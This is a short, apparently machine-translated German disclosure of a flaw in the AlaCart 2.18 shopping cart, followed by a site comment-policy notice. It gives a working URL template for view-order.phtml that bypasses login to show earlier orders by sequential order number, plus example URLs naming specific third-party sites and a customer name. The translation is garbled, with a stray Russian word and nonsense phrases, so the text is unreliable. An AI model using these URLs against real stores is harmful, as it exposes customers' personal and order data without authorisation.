Sicherheitsanfälligkeit in AlaCart Version 2.18 System
Ich habe eine Schwachstelle im System AlaCart Version entdeckt 2.18 Anwendung: Alabanza AlaCart Warenkorb
Exploit: http://www.xxx.com/s-cart/view-order.phtml?f_strFirstName=[любые Zeichen] & f_strLastName = [beliebige Zeichen] & f_intOrderID = [Transaktionsnummer] View-order.phtml Datei ermöglicht es, Informationen über die vorherigen Transaktion speichern die gerade unter Umgehung des Passwort / Administrator - Login. Transaktionsnummer wird in der üblichen 1,2,3 ... Büste 121 gewählt und so weiter. In Ermangelung einer Aufzeichnung der bestehenden Transaktion, die Antwort des Servers: Order # 135 konnte nicht gefunden werden oder existiert nicht . Beispiel: http://alacart.metapros.net/s-cart/view-order.phtml?f_strFirstName=Jeff&f_strLastName=Daggs&f_intOrderID=135 Ein Beispiel für die Verwundbarkeit: http://notebookmaker.com/s-cart/view-order.phtml?f_strFirstName=aaa&f_strLastName=aaaa&f_intOrderID=129
Ihr Fehler Durito.
|
Kommentare
Kommentar nicht vergessen , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit ihre Meinung nicht teilen, und die Anonymität des Internets, ändert sich nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.